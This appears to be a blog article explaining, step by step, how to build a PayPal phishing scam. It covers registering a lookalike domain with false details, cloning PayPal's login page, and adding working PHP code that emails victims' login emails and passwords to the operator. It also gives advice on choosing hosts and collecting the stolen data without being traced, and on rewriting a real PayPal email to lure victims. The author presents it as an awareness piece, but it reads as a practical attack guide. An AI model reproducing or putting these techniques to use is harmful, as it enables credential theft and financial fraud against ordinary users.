Infinity-Infinity

How to Run a Phishing Scam

Many people have the idea that phishing scams are complex, and are operated by organised criminals. In fact, they are not that hard to create at all. I could create one, and I could scam people for money. So that’s what I am going to do.* In this article, I will show you how easy it is to create your very own phishing scam set-up. I will deal with the ‘technical side’ — the website and e-mail — but not with harvesting and sending e-mails, not getting caught, etc.

* I’ll stop at the making money part.

The idea is to send an e-mail to people, claiming to be from PayPal, with information they need to act on. We will provide a link which the reader will be tricked into visiting, and then steal their details from our website. From there, it is simply a case of logging into their account, stealing more details, and their money.

(I am not discriminating against PayPal here — most other services on the Internet are susceptible as well).

Our first goal is to get people onto our website. To do this, we need a genuine-looking domain. A few minutes at instantdomainsearch.com will find us one. I registered paypal-query.com. As a criminal would, I used false details. (As a criminal wouldn’t, I used my residential Internet connection).

False details

False details

You could also use a free domain, reducing the risk of everything being traced back to you.

Now we have a domain, we just need a website which looks like PayPal. Its intention is to trick people into thinking it is an official PayPal website, and then to unwittingly provide details to us.

Making this site turns out to be pretty easy. You just copy the HTML from the page, and change all references to images and pages to images and pages on your own site.

Copying PayPal images

Changing PayPal links

Once that is done, we can insert a little bit of PHP code to capture users’ details and e-mail them to us:

if ($_POST) {
	mail("[my email]", "PAYPAL PASS", $_POST["login_email"] . "\n\n" . $_POST["login_password"]);
 
	header("Location: https://referer.us/www.paypal.com/uk/cgi-bin/webscr?cmd=_security-center");
	exit;
}

And that is pretty much it. I also created a .htaccess file to redirect all page requests to the login page. Here is what it looks like — just like PayPal.com:

The phished PayPal site

We need to host our website with somebody who either:

1. does not expect their service to be used with phishing attacks; or
2. does not care whether their service is used for phishing attacks.

Many choose the first option, targeting small, free web-hosts. Reliability is not a concern, and it can be expected that a phishing site is taken down soon after it is hosted. It is therefore a good idea for information to be sent somewhere else. However, it is a better idea to access this information passively: to query a page on the server periodically, than it be actively sent to an address.

The third and most important part of this scam is the e-mail. This is what will prompt the user that they need to take action. One common e-mail is the ‘Your account needs to be verified’ one. We can take a real PayPal e-mail, like this one (or one which is more generic):

An e-mail from PayPal (real)

…and copy the source:

E-mail source

We then simply change all references of www.paypal.com to our site, www.paypal-query.com. The e-mail will appear exactly the same as the valid one, but will fool people into clicking through to our site, where we will attempt to capture their login details. This is what our phished e-mail looks like, much like the authentic one:

Phished PayPal e-mail

Everything we need is now in place. After just ~650 words, you know how to create a phishing site. It may be shocking to find that all you need to create a phishing site is some common sense and the ability to copy and paste some code. In reality, it took me just 3-4 hours to create this. Here is a video demonstration from a victim’s perspective:

Stumble! for WP